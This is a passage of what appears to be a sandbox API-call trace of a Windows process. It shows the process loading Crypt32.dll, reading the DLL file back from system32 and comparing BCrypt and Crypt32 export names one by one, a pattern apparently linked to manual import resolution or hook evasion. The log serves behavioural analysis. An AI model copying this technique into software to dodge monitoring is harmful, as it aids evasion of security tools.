(lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0232.500] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0232.501] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0232.504] GetProcessHeap () returned 0x560000 [0232.506] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2db2010 | out: hHeap=0x560000) returned 1 [0232.506] GetProcessHeap () returned 0x560000 [0232.506] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x579310 [0232.507] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0232.761] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0232.762] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0232.763] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0232.763] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0232.763] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0232.763] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0232.763] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0232.763] GetProcessHeap () returned 0x560000 [0232.763] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1c30e0) returned 0x4273040 [0232.769] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0232.769] ReadFile (in: hFile=0x160, lpBuffer=0x4273040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4273040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0233.057] CloseHandle (hObject=0x160) returned 1 [0233.058] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0233.058] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0233.058] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0233.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0233.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0233.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0233.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0233.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0233.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0233.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0233.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0233.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0233.059] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0233.059] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0233.059] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0233.059] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0233.059] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0233.059] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0233.059] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0233.059] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0233.059] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0233.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0233.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0233.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0233.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0233.062] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.062] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0233.062] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0233.063] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0233.064] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0233.064] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.065] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.065] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.066] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0233.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0233.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0233.067] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.068] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.068] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.068] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0233.068] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.069] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.069] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.069] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0233.069] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0233.069] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0233.069] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0233.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0233.070] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0233.070] lstrcmpA (lpString1="CertCompareCertificate", 